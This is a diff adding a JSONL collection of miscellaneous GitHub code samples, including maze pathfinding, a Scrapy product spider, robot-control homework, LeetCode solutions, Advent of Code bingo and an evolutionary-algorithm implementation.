diff --git "a/5579.jsonl" "b/5579.jsonl" new file mode 100644--- /dev/null +++ "b/5579.jsonl" @@ -0,0 +1,857 @@ +{"seq_id":"12551812550","text":"# [3] Алгоритмы поиска пути и структурное программирование\nimport numpy as np\nfrom queue import PriorityQueue\n\n#так как у меня др 9 августа, будем использовать метод поиска в глубину\ndef maze_to_array(file_name):\n with open(file_name, 'r') as f:\n maze = [i.rstrip() for i in f]\n for i in range(len(maze)):\n maze[i]=list(maze[i])\n return maze\n\ndef maze_to_file(path, file_name):\n with open(file_name, 'w') as f: \n for i in maze_resh:\n for j in i:\n f.write(f\"{j}\")\n f.write(f\"\\n\")\n\ndef data(maze):\n print(f\"границы по столбцу [0,{len(maze[0])}], по строке [0,{len(maze[:])}]\")\n x_a = int(input(\"координаты аватара по столбцу: \")) -1\n y_a = int(input(\"координаты аватара по строке: \")) -1\n x_k = int(input(\"координаты ключа по столбцу: \")) -1\n y_k = int(input(\"координаты ключа по строке: \")) -1\n maze[y_a][x_a] = 'A' #взял наоборот, тк в блокноте неправильная СО\n maze[y_k][x_k] = '*'\n start = (y_a, x_a)\n key = (y_k, x_k)\n return start, key\n\ndef make_step(maze, lv, v, q): \n coord = [ ( 0 , -1 ),( 1 , 0 ),( 0 , 1 ),( -1 , 0 ) ] \n for x_step, y_step in coord:\n x, y = lv[0] + x_step, lv[1] + y_step \n if 0 < x < len(maze) and 0 < y < len(maze[0]): \n if v.get((x, y)) == None and maze[x][y] != '#': \n v[(x, y)] = (lv) \n q.append((x, y))\n return q , v\n\ndef maze_way(maze, path, sign):\n way = np.copy(maze) \n for i in path:\n if way[i[0],i[1]] != '*' and way[i[0],i[1]] != 'A':\n way[i[0],i[1]] = sign\n return way\n\ndef ro(end, c):\n return abs(end[0] - c[0]) + abs(end[1] - c[1])\n\n# метод поиска в глубину\ndef search_vglubinu(maze, start, end):\n v = {} \n v[start] = start\n q = [] \n q.append(start)\n while len(q) != 0: \n lv = q.pop() \n step = make_step(maze, lv, v, q)\n q = step[0]\n v = step[1]\n path = reverse_path(v, start, end)\n return path\n\ndef reverse_path(v, start, end): \n c, path = end, []\n while c != start:\n path.append(c)\n c = v[c]\n path.append(start)\n path.reverse()\n return path\n\ndef get_neighbors(maze, pos):\n row, col = pos\n neighbors = [(row-1, col), (row+1, col), (row, col-1), (row, col+1)]\n return [neighbor for neighbor in neighbors if 0 <= neighbor[0] < len(maze) and 0 <= neighbor[1] < len(maze[0])]\n\n#метод поиска A*\ndef search_a(maze, start, end, max_cost):\n pq = PriorityQueue()\n pq.put(start, 0)\n c = {}\n cost = {}\n c[start] = None\n cost[start] = 0\n while not pq.empty():\n i = pq.get()\n if i == end:\n break\n for n in get_neighbors(maze, i):\n new_cost = cost[i] + 1\n if 0 <= n[0] < len(maze) and 0 <= n[1] < len(maze[0]) and maze[n[0]][n[1]] != '#' and (n not in cost or new_cost < cost[n]) and new_cost <= max_cost:\n cost[n] = new_cost\n p = new_cost + ro(end, n)\n pq.put(n, p)\n c[n] = i\n path = reverse_path(c, start, end)\n return path\n\nmaze = maze_to_array(\"maze-for-u.txt\")\nstart, key = data(maze)\nend_1 = (1,1)\nend_2 = (len(maze[:])-2, len(maze[0])-2)\nif ro(key, end_1) < ro(key, end_2):\n end = end_1\n print(\"\\nближний выход - верхний\")\nelse:\n end = end_2\n print(\"\\nближний выход - нижний\")\n\npath_to_key = search_vglubinu(maze, start, key)\npath_to_end = search_a(maze, key, end, 100000)\n\nprint(\"длина от аватара до ключа =\", len(path_to_key)-1, \"методом поиска в глубину\")\nprint(\"длина от ключа до выхода =\", len(path_to_end)-1, \"методом A*\")\nprint(\"длина от аватара до выхода =\", len(path_to_key)+len(path_to_end)-1)\n\nmaze_resh = 
maze_way(maze, path_to_key , '.')\nmaze_resh = maze_way(maze_resh, path_to_end , ',')\nmaze_to_file(maze_resh, \"maze-for-me-done.txt\")\nprint(\"файл создан под названием 'maze-for-me-done.txt'\")\nprint(\"'A'-аватар,'*'-ключ,'.'-путь от 'A' до '*',','-путь от '*' до выхода\")\n'''\nграницы по столбцу [0,800], по строке [0,600]\nкоординаты аватара по столбцу: 790\nкоординаты аватара по строке: 10\nкоординаты ключа по столбцу: 10\nкоординаты ключа по строке: 590\n\nближний выход - верхний\nдлина от аватара до ключа = 1442 методом поиска в глубину\nдлина от ключа до выхода = 2174 методом A*\nдлина от аватара до выхода = 3617\nфайл создан под названием 'maze-for-me-done.txt'\n'A'-аватар,'*'-ключ,'.'-путь от 'A' до '*',','-путь от '*' до выхода\n'''\n","repo_name":"kit8nino/2023-MP","sub_path":"429/svyatov_kirill/[3].py","file_name":"[3].py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"29439099929","text":"import scrapy\nfrom uncommonGoodsScraping.items import UncommongoodsscrapingItem\nfrom uncommonGoodsScraping.items import ImgData\nfrom scrapy.http import Request\n\n\n\n# To read from a csv file\nimport csv\nclass UncommongoodsSpider(scrapy.Spider):\n name = 'uncommonGoods'\n allowed_domains = ['uncommongoods.com']\n start_urls = ['http://uncommongoods.com/']\n# This function helps us to scrape the whole content of the website\n # by following the starting URLs in a csv file.\n def start_requests(self):\n # Read main category URLs from a csv file\n with open (\"/Users/AB/Pictures/Uncommon-Goods/uncommonGoodsScraping/csvFiles/SpiderMainCategoryLinksUC.csv\", \"rU\") as f:\n reader=csv.DictReader(f)\n for row in reader:\n url=row['url']\n link_urls = [url.format(i) for i in range(1,6)]\n for link_url in link_urls:\n print(link_url)\n\n request=Request(link_url, callback=self.parse_product_pages,meta={'interests': row['interests']})\n yield request\n# This function scrapes the page with the help of xpath provided\n def parse_product_pages(self,response):\n item = UncommongoodsscrapingItem()\n \n # Get the HTML block where all the products are listed\n # HTML element with the \"product-list-item\" class name\n content=response.xpath('//*[@id=\"frame\"]/app-ug-spa/div/div/app-family-page/main/div[2]/div/ul')\n # loop through each element in the content\n for product_content in content:\n image_urls = []\n # get the product details and populate the items\n item['productId']=product_content.xpath('.//article/@id').extract_first()\n item['productName']=product_content.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"product__name\", \" \" ))]').extract_first()\n item['price']=product_content.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"price\", \" \" ))]').extract_first()\n item['imageUrl']=product_content.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"ng-lazyloaded\", \" \" ))]/img/@src').extract_first()\n item['productLink']=\"https://www.uncommongoods.com/\"+product_content.xpath('.//a/@href').extract_first()\n image_urls.append(item['imageUrl'])\n item['company']=\"UNCOMMON\"\n item['interests']=response.meta['interests']\n \n if item['productId']==None:\n break\n yield (item)\n # download the image contained in image_urls\n yield ImgData(image_urls=image_urls)\n ","repo_name":"abdimohamud/Uncommon-Goods","sub_path":"uncommonGoodsScraping/uncommonGoodsScraping/spiders/uncommonGoods.py","file_name":"uncommonGoods.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"4919002176","text":"\"\"\"Hussain Mumtaz\n Anissa Sexton\n husmum@gatech.edu\n\n We worked on this homework assignment alone,\n using only this semester's course materials\"\"\"\n\n\nfrom Myro import *\nfrom Graphics import *\n\ninit()\n\ndef sensorValue():\n a = getLight(\"left\")\n b = getLight(\"right\")\n c = getObstacle(\"right\")\n v = a/(b+c)\n value = round(v,3)\n return (value)\n\nwin= Window(\"A\",250,250)\nwin.mode = \"manual\"\n\ndef move(win,event):\n log = open(\"myMovements.txt\",\"w\") #Creates the file\n log.close()\n log = open(\"myMovements.txt\", \"a\")\n \"\"\"Each additional movement must be appended,\n otherwise the file will be overwritten each time\"\"\"\n\n if event.key == \"Up\":\n forward (1,.1)\n s = sensorValue()\n a = \" \".join ((\"forward .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"Down\":\n backward(1,.1)\n s = sensorValue()\n a = \" \".join ((\"backward .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"Left\":\n turnLeft(1,.1)\n s = sensorValue()\n a = \" \".join ((\"turnLeft .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"Right\":\n turnRight(1,.1)\n s = sensorValue()\n a = \" \".join ((\"turnRight .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"b\":\n beep (1,800)\n s = sensorValue()\n a = \" \".join ((\"beep 1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"B\":\n beep (1,800)\n s = sensorValue()\n a = \" \".join ((\"beep 1\", str(s), \"\\n\"))\n log.write (a)\n\n log.close()\n\ndef collectData (myFile, direction):\n toRead = open(myFile,\"r\")\n time = 0\n beep = 0\n timesDirection = 0\n while True:\n line = toRead.readline()\n\n words = line.split()\n if len(line) != 0:\n margTime = float(words[1])\n time += margTime\n\n if \"beep\" in line:\n beep += 1\n\n if direction in line:\n timesDirection += 1\n if len(line) == 0:\n break\n\n print (\"The robot traveled for\", time,\n \"seconds total, beeping\", beep, \"times. 
This\"\n \" robot moved\", direction, \"a total of\",\n timesDirection, \"times.\")\n\n\ndef replay (myFile):\n toRead = open(myFile,\"r\")\n while True:\n line = toRead.readline()\n\n words = line.split()\n if len(line) != 0:\n direction = words[0]\n time = int (words[1])\n if direction != \"beep\":\n eval(direction) (1,time)\n elif direction == \"beep\":\n eval(direction) (time,800)\n if len(line) == 0:\n break\n\nonKeyPress(move)\n","repo_name":"hmumtaz/gatech","sub_path":"CS1301/HW05/hw05.py","file_name":"hw05.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44069743771","text":"#\n# @lc app=leetcode id=703 lang=python3\n#\n# [703] Kth Largest Element in a Stream\n#\n\n# @lc code=start\nimport bisect\nimport heapq\nfrom typing import List\n\n\nclass KthLargest:\n\n def __init__(self, k: int, nums: List[int]):\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n while k < len(self.nums):\n heapq.heappop(self.nums)\n \n\n def add(self, val: int) -> int:\n heapq.heappush(self.nums, val)\n if self.k < len(self.nums):\n heapq.heappop(self.nums)\n return self.nums[0]\n\n\n# Your KthLargest object will be instantiated and called as such:\n# obj = KthLargest(k, nums)\n# param_1 = obj.add(val)\n# @lc code=end\n","repo_name":"yoshikipom/leetcode","sub_path":"solve/703.kth-largest-element-in-a-stream.py","file_name":"703.kth-largest-element-in-a-stream.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31568100422","text":"from cn.edustar.jitar.util import ParamUtil\r\nfrom evaluation_query import *\r\nfrom base_action import *\r\n\r\nclass evaluation_stats(ActionResult, SubjectMixiner, EvaluationBase):\r\n def __init__(self):\r\n self.params = ParamUtil(request)\r\n \r\n def execute(self):\r\n if self.canManage() == False:\r\n self.addActionError(u\"需要系统内容管理员进行管理。\")\r\n return self.ERROR\r\n \r\n cmd = self.params.safeGetStringParam(\"cmd\")\r\n if cmd == \"\":cmd = \"list\"\r\n if cmd == \"list\":\r\n self.list()\r\n \r\n return \"/WEB-INF/ftl/evaluation/evaluation_stats.ftl\"\r\n \r\n def list(self):\r\n qry = EvaluationPlanQuery(\"ev.evaluationPlanId, ev.evaluationYear, ev.evaluationSemester, ev.evaluationTimes, ev.metaSubjectId, ev.metaGradeId, ev.startDate, ev.endDate, ev.userCount, ev.enabled, ev.attendUserCount, ev.evaluationCount\")\r\n pager = self.params.createPager()\r\n pager.itemName = u\"评课活动\"\r\n pager.itemUnit = u\"个\"\r\n pager.totalRows = qry.count()\r\n pager.pageSize = 20\r\n evaluation_list = qry.query_map(pager)\r\n request.setAttribute(\"pager\", pager)\r\n request.setAttribute(\"evaluation_list\", evaluation_list)\r\n self.putSubjectList()\r\n self.putGradeList()\r\n","repo_name":"yxxcrtd/jitar2.0","sub_path":"WebContent/manage/evaluation/evaluation_stats.py","file_name":"evaluation_stats.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70317219642","text":"\"\"\"Run full process tests on dismantle.\"\"\"\nfrom pathlib import Path\n\nfrom dismantle.extension import Extensions\nfrom dismantle.index import JsonFileIndexHandler\nfrom dismantle.package import LocalPackageHandler\n\n\ndef test_full(datadir: Path) -> None:\n from tests.ColorExtension import ColorExtension\n from tests.GreetingExtension import GreetingExtension\n ext_types = 
[ColorExtension, GreetingExtension]\n index_src = datadir / 'index.json'\n index = JsonFileIndexHandler(str(index_src))\n packages = {}\n for pkg_meta in index:\n meta = index[pkg_meta]\n path = datadir / meta['path']\n package = LocalPackageHandler(meta['name'], path)\n package._meta = {**package._meta, **meta}\n package.install()\n packages[package.name] = package\n extensions = Extensions(ext_types, packages, 'd_')\n assert extensions.types == ['color', 'greeting']\n assert list(extensions.category('color').keys()) == [\n '@scope-one/package-one.extension.green.GreenColorExtension',\n '@scope-one/package-two.extension.red.RedColorExtension',\n '@scope-one/package-three.extension.blue.BlueColorExtension',\n ]\n assert list(extensions.extensions.keys()) == ['color', 'greeting']\n assert sorted(extensions.imports.keys()) == sorted([\n '@scope-one/package-one.extension.hello',\n '@scope-one/package-one.extension.green',\n '@scope-one/package-two.extension.afternoon',\n '@scope-one/package-two.extension.red',\n '@scope-one/package-three.extension.goodbye',\n '@scope-one/package-three.extension.blue'\n ])\n","repo_name":"area28technologies/dismantle","sub_path":"tests/dismantle_test.py","file_name":"dismantle_test.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"18717709494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 4 07:43:22 2021\n\n@author: Odatas\n\"\"\"\n\nimport numpy\n\n#Checks a matrix for bingo\ndef testForBingo(matrix):\n a = numpy.sum(matrix,axis=0) \n b = numpy.sum(matrix,axis=1) \n for i in a:\n if i > 4:\n return True\n for i in b:\n if i > 4:\n return True\n return False\n\n#calculate the sum of the fields of the matrix which are 0 on the shadow\ndef calculateSum(matrix,shadow):\n matrixsum=0\n for i in range(5):\n for j in range(5):\n if shadow[i][j]==0:\n matrixsum += matrix[i][j]\n \n return matrixsum\n\n#get the bingo number draw\nwith open('day4.txt') as f:\n first_line = f.readline()\n draws = [int(s) for s in first_line.split(\",\")]\n\n#get the bingo cards\ndata = numpy.loadtxt('day4.txt',skiprows=2)\nbingoCards = numpy.array_split(data,len(data)/5)\n#Create the shadow for marking numbers on bingocard\nshadow = []\nfor i in range(int(len(data)/5)):\n shadow.append(numpy.zeros((5,5)))\n\n#Tupel List for Cardnumber and which number made the Card win bingo\ntupelList=[]\n#Go through all draws\nfor bingoDraw in draws:\n #check every card\n for cardNumber in range(len(bingoCards)):\n #if the drawn number is in the bingo card check it\n if bingoDraw in bingoCards[cardNumber] :\n #if the bingocard already won, skip it\n if len([item for item in tupelList if item[0] == cardNumber]) > 0:\n continue\n #look up the field where the number is\n tupel=numpy.where(bingoDraw == bingoCards[cardNumber])\n #mark the field in the shadowcard\n shadow[cardNumber][tupel[0][0]][tupel[1][0]] = 1\n #check if the card has now a Bingo\n if testForBingo(shadow[cardNumber]):\n #when bingo save card and number which made card win\n if len([item for item in tupelList if item[0] == cardNumber]) == 0:\n tupelList.append((cardNumber,bingoDraw))\nfirst = (0,0)\nlast = (0,0)\n#go through all draws again and save the first occurring winner and the last one\nfor bingoDraw in draws:\n for tupel in tupelList:\n if bingoDraw == tupel[1]:\n last = tupel\n if first == (0,0):\n first = tupel\n \nprint(\"Part 1:\", first[1] * calculateSum(bingoCards[first[0]],shadow[first[0]]))\nprint(\"Part 
2:\", last[1] * calculateSum(bingoCards[last[0]],shadow[last[0]]))\n\n\n\n","repo_name":"Odatas/Advent-of-Code","sub_path":"2021/Day 04/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16247512243","text":"# To handle passing the data in from the json files\n\n\nimport json\n\n\ndef get_data_type(name_string, attribute_name):\n print(\"Attempting to load data- \" + name_string + \".json\")\n try:\n with open('yelp_data/yelp_academic_dataset_' + name_string + '.json', 'r', encoding='ascii', errors='ignore') as f:\n data = [json.loads(line)[attribute_name] for line in f]\n return data\n except json.JSONDecodeError as e:\n print(e)\n\ndef get_business_id(business_name):\n print(\"Getting Business ID\")\n ids = get_data_type(\"business\", \"business_id\")\n names = get_data_type(\"business\", \"name\")\n for i in range(0, len(names)):\n if names[i] == business_name:\n\n return ids[i]\n return -1\n\ndef get_stars_for_business(business_id):\n print('Getting stars and dates for business')\n result_stars = []\n result_dates = []\n corresponding_business = get_data_type('review', 'business_id')\n all_stars = get_data_type('review', 'stars')\n all_dates = get_data_type('review', 'date')\n\n for i in range(0, len(corresponding_business)):\n if corresponding_business[i] == business_id:\n result_stars.append(all_stars[i])\n result_dates.append(all_dates[i])\n print(len(result_stars))\n print(len(result_dates))\n return result_stars, result_dates\n\n","repo_name":"nverlin/yelp_challenge","sub_path":"data_handler.py","file_name":"data_handler.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70654171001","text":"import os\n\nfrom gi.repository import Gtk\n\nfrom _entropy.rigo.paths import DATA_DIR\n\nfrom entropy.i18n import _\n\n\nclass WelcomeBox(Gtk.VBox):\n\n def __init__(self):\n Gtk.VBox.__init__(self)\n self._image_path = os.path.join(DATA_DIR, \"ui/gtk3/art/rigo.png\")\n\n def render(self):\n image = Gtk.Image.new_from_file(self._image_path)\n label = Gtk.Label()\n label.set_markup(_(\"Browse Applications with ease\"))\n self.pack_start(image, False, False, 0)\n self.pack_start(label, False, False, 0)\n label.show()\n image.show()\n","repo_name":"Sabayon/entropy","sub_path":"rigo/rigo/ui/gtk3/widgets/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"40"} +{"seq_id":"71045742201","text":"\"\"\"\nA fully configurable, general (mu+lambda) Evolutionary Algorithm.\n\nThis evolutionary algorithm begins by sampling\n:attr:`~moptipy.algorithms.so.ea.EA.mu`\nsolutions using the nullary search operation\n:attr:`~moptipy.api.algorithm.Algorithm0.op0`. In each iteration, it then uses\n:attr:`~moptipy.algorithms.so.ea.EA.mu` existing solutions as input for\nthe search operations, where, for each solution to be sampled, the binary\noperation :attr:`~moptipy.api.algorithm.Algorithm2.op2` is used with\nprobability :attr:`~moptipy.algorithms.so.ea.EA.br` and (otherwise), the unary\noperator :attr:`~moptipy.api.algorithm.Algorithm1` is used. The inputs of both\noperators are chosen from the :attr:`~moptipy.algorithms.so.ea.EA.mu`\nsolutions using :attr:`~moptipy.algorithms.so.general_ea.GeneralEA.mating`\nselection. 
After :attr:`~moptipy.algorithms.so.ea.EA.lambda_` new solutions\nhave been created this way (and have been evaluated as well), a fitness\nassignment process (:class:`~moptipy.algorithms.so.fitness.Fitness`) assigns\nfitness values to them based on their objective values\n(:attr:`~moptipy.algorithms.so.record.Record.f`), maybe also using the index\nof the iteration (:attr:`~moptipy.algorithms.so.record.Record.it`) in which\nthey were created. The survival selection\n:attr:`~moptipy.algorithms.so.general_ea.GeneralEA.survival` then chooses,\nfrom the joint set of `mu+lambda` solutions, the `mu` solutions for the\nnext iteration. Both mating and survival selection are instances of class\n:class:`~moptipy.algorithms.modules.selection.Selection`.\n\nThis algorithm is equivalent to :class:`~moptipy.algorithms.so.ea.EA`, but\nallows for using a customized fitness assignment step\n(:class:`~moptipy.algorithms.so.fitness.Fitness`) as well as customizable\nsurvival and :attr:`~moptipy.algorithms.so.general_ea.GeneralEA.mating`\nselection (:class:`~moptipy.algorithms.modules.selection.Selection`).\n\n1. Thomas Bäck, David B. Fogel, and Zbigniew Michalewicz, eds., *Handbook of\n Evolutionary Computation.* 1997. Computational Intelligence Library.\n New York, NY, USA: Oxford University Press, Inc. ISBN: 0-7503-0392-1\n2. James C. Spall. *Introduction to Stochastic Search and Optimization.*\n Estimation, Simulation, and Control - Wiley-Interscience Series in Discrete\n Mathematics and Optimization, volume 6. 2003. Chichester, West Sussex, UK:\n Wiley Interscience. ISBN: 0-471-33052-3. http://www.jhuapl.edu/ISSO/.\n3. Frank Hoffmeister and Thomas Bäck. Genetic Algorithms and Evolution\n Strategies: Similarities and Differences. In Hans-Paul Schwefel and\n Reinhard Männer, *Proceedings of the International Conference on Parallel\n Problem Solving from Nature (PPSN I),* October 1-3, 1990, Dortmund,\n Germany, volume 496 of Lecture Notes in Computer Science, pages 455-469,\n Berlin/Heidelberg, Germany: Springer. 
ISBN: 978-3-540-54148-6.\n https://doi.org/10.1007/BFb0029787.\n\"\"\"\nfrom typing import Callable, Final, cast\n\nfrom numpy.random import Generator\n\nfrom moptipy.algorithms.modules.selection import (\n FitnessRecord,\n Selection,\n check_selection,\n)\nfrom moptipy.algorithms.modules.selections.best import Best\nfrom moptipy.algorithms.modules.selections.random_without_repl import (\n RandomWithoutReplacement,\n)\nfrom moptipy.algorithms.so.ea import EA, _float_0\nfrom moptipy.algorithms.so.fitness import Fitness, FRecord, check_fitness\nfrom moptipy.algorithms.so.fitnesses.rank_and_iteration import RankAndIteration\nfrom moptipy.api.operators import Op0, Op1, Op2\nfrom moptipy.api.process import Process\nfrom moptipy.utils.logger import KeyValueLogSection\nfrom moptipy.utils.strings import PART_SEPARATOR\n\n\nclass _Record(FRecord):\n \"\"\"Same as `FRecord`, but with a secret selection marker.\"\"\"\n\n def __init__(self, x, f: int | float, selected: bool = False):\n \"\"\"\n Create the record.\n\n :param x: the data structure for a point in the search space\n :param f: the corresponding objective value\n :param selected: is the record currently in use?\n \"\"\"\n super().__init__(x, f)\n #: an internal flag - do NOT access!!\n self._selected: bool = selected\n\n\n# start book\nclass GeneralEA(EA):\n \"\"\"The fully customizable (mu+lambda) EA.\"\"\"\n\n def solve(self, process: Process) -> None:\n \"\"\"\n Apply the (mu+lambda) EA to an optimization problem.\n\n :param process: the black-box process object\n \"\"\"\n # initialization of some variables omitted in book for brevity\n# end book\n mu: Final[int] = self.mu # mu: number of best solutions kept\n lambda_: Final[int] = self.lambda_ # number of new solutions/gen\n mu_plus_lambda: Final[int] = mu + lambda_ # size = mu + lambda\n random: Final[Generator] = process.get_random() # random gen\n create: Final[Callable] = process.create # create x container\n evaluate: Final[Callable] = process.evaluate # the objective\n op0: Final[Callable] = self.op0.op0 # the nullary operator\n op1: Final[Callable] = self.op1.op1 # the unary operator\n op2: Final[Callable] = self.op2.op2 # the binary operator\n br: Final[float] = self.br # the rate at which to use op2\n should_terminate: Final[Callable] = process.should_terminate\n r01: Final[Callable[[], float]] = cast( # only if 0 quit # -book\n f = evaluate(x) # continue? ok, evaluate new solution\n recs[i] = _Record(x, f, selected) # create and store record\n\n mating_pool: Final[list] = recs[0:mu] # the selection survivors\n assign_fitness(mating_pool, random) # assign fitness first time\n# end book\n mating_pool_clear: Final[Callable[[], None]] = mating_pool.clear\n mating_pool_append: Final[Callable[[FitnessRecord], None]] = \\\n cast(Callable[[FitnessRecord], None], mating_pool.append)\n# start book\n it: int = 0 # set the iteration counter\n while True: # lst: keep 0..mu-1, overwrite mu..mu+lambda-1\n it = it + 1 # step the iteration counter\n population_clear() # clear population\n\n di = 0 # set index of next potential destination\n for _ in range(lambda_): # for all lambda offspring\n if should_terminate(): # only continue if we still... 
# -book\n if process.has_log(): # -book\n self.fitness.log_information_after_run( # -book\n process) # -book\n return # ...have sufficient budget # -book\n while True: # get the next non-selected record\n dest = recs[di] # get the record\n di = di + 1 # step counter\n if dest._selected: # if it was selected\n dest._selected = False # mark it as unselected\n population_append(dest) # store in population\n continue # try next record\n break # use the (unselected) record as destination\n\n x = dest.x # the destination \"x\" value\n dest.it = it # remember iteration of solution creation\n do_binary: bool = r01() < br # will we do binary operation?\n parents_clear() # clear mating pool: room for 2\n mating_selection(mating_pool, parents_append,\n 2 if do_binary else 1, random)\n\n if do_binary: # binary operation (with p == br)\n op2(random, x, parents[0].x, parents[1].x)\n else: # unary operation otherwise\n op1(random, x, parents[0].x) # apply unary op\n dest.f = evaluate(x) # evaluate new point\n population_append(dest) # store in population\n\n # add remaining selected solutions from recs to population\n # from index di to mu+lambda ... omitted for brevity in book\n # end book\n for di2 in range(di, mu_plus_lambda):\n other = recs[di2]\n if other._selected: # only if solution was selected\n other._selected = False # set as unselected\n population_append(other) # put into population\n # start book\n assign_fitness(population, random) # assign fitness\n mating_pool_clear() # clear list of survived records\n survival_selection(population, mating_pool_append, mu, random)\n for rec in mating_pool: # mark all selected solutions as\n rec._selected = True # selected\n# end book\n\n def __init__(self, op0: Op0,\n op1: Op1 | None = None,\n op2: Op2 | None = None,\n mu: int = 1, lambda_: int = 1,\n br: float | None = None,\n fitness: Fitness | None = None,\n survival: Selection | None = None,\n mating: Selection | None = None,\n name: str = \"generalEa\") -> None:\n \"\"\"\n Create the customizable Evolutionary Algorithm (EA).\n\n :param op0: the nullary search operator\n :param op1: the unary search operator\n :param op2: the binary search operator\n :param mu: the number of best solutions to survive in each generation\n :param lambda_: the number of offspring in each generation\n :param br: the rate at which the binary operator is applied\n :param fitness: the fitness assignment process\n :param survival: the survival selections algorithm\n :param mating: the mating selections algorithm\n :param name: the base name of the algorithm\n \"\"\"\n if fitness is None:\n fitness = RankAndIteration()\n if fitness.__class__ is not RankAndIteration:\n name = f\"{name}{PART_SEPARATOR}{fitness}\"\n if survival is None:\n survival = Best()\n if mating is None:\n mating = RandomWithoutReplacement()\n if (survival.__class__ is not Best) \\\n or (mating.__class__ is not RandomWithoutReplacement):\n name = f\"{name}{PART_SEPARATOR}{survival}{PART_SEPARATOR}{mating}\"\n\n super().__init__(op0, op1, op2, mu, lambda_, br, name)\n #: the fitness assignment process\n self.fitness: Final[Fitness] = check_fitness(fitness)\n #: the survival selection algorithm\n self.survival: Final[Selection] = check_selection(survival)\n #: the mating selection algorithm\n self.mating: Final[Selection] = check_selection(mating)\n\n def log_parameters_to(self, logger: KeyValueLogSection) -> None:\n \"\"\"\n Log the parameters of the algorithm to a logger.\n\n :param logger: the logger for the parameters\n \"\"\"\n 
super().log_parameters_to(logger)\n with logger.scope(\"fitness\") as v:\n self.fitness.log_parameters_to(v)\n with logger.scope(\"survival\") as s:\n self.survival.log_parameters_to(s)\n with logger.scope(\"mating\") as m:\n self.mating.log_parameters_to(m)\n\n def initialize(self) -> None:\n \"\"\"Initialize the algorithm.\"\"\"\n super().initialize()\n self.survival.initialize()\n self.mating.initialize()\n self.fitness.initialize()\n","repo_name":"thomasWeise/moptipy","sub_path":"moptipy/algorithms/so/general_ea.py","file_name":"general_ea.py","file_ext":"py","file_size_in_byte":13399,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"22436333370","text":"from life import Player, Team\n\nteam = Team()\n\nfor player in range(9):\n name = input(\"Batter's Name:\\n>\")\n practice = int(input(\"How much time dedicated to practice on a scale from 0-100:\\n>\"))\n downtime = 100 - practice\n\n player = Player(name, practice, downtime)\n player.performance()\n\n team.add_batters(player)\n\nprint(\"Batters:\")\nfor player in team.bat_team:\n print(player + \"\\n\")\n\nfor player in range(3):\n name = input(\"Pitcher's Name:\\n>\")\n practice = int(input(\"How much time dedicated to practice on a scale from 0-100:\\n>\"))\n downtime = 100 - practice\n\n player = Player(name, practice, downtime)\n player.performance()\n\n team.add_pitchers(player)\n\nprint(\"Pitchers:\")\nfor player in team.pitchers:\n print(player)\n\nteam.at_bat()\n","repo_name":"rallen0150/modeling_life","sub_path":"life_sim.py","file_name":"life_sim.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11730590586","text":"def solution(people, limit):\n answer = 0\n people.sort(reverse=True)\n curr_min = (people[-1], len(people)-1) # 가장 적은 몸무게와 인덱스를 저장\n \n for i, weight in enumerate(people):\n rest = limit - weight\n # 현재 사람 1을 태운 보트에 나머지 사람이 가장 적은 몸무게를 태울 수 있다면\n # 사람 1보다 더 적은 몸무게의 사람도 마찬가지로 가장 적은 몸무게의 사람과 탈 수 있으므로\n # 현재 상황이 가장 꽉 차게 태울 수 있다. \n if rest >= curr_min[0]:\n if i <= curr_min[1]:\n answer += 1\n next_min_idx = curr_min[1] - 1\n curr_min = (people[next_min_idx], next_min_idx)\n else: # 더 이상 뒤에 태울 사람이 없으므로 종료\n return answer\n \n else:\n answer += 1\n \n return answer\n ","repo_name":"hayoung-99/algorithm","sub_path":"프로그래머스/lv2/42885. 
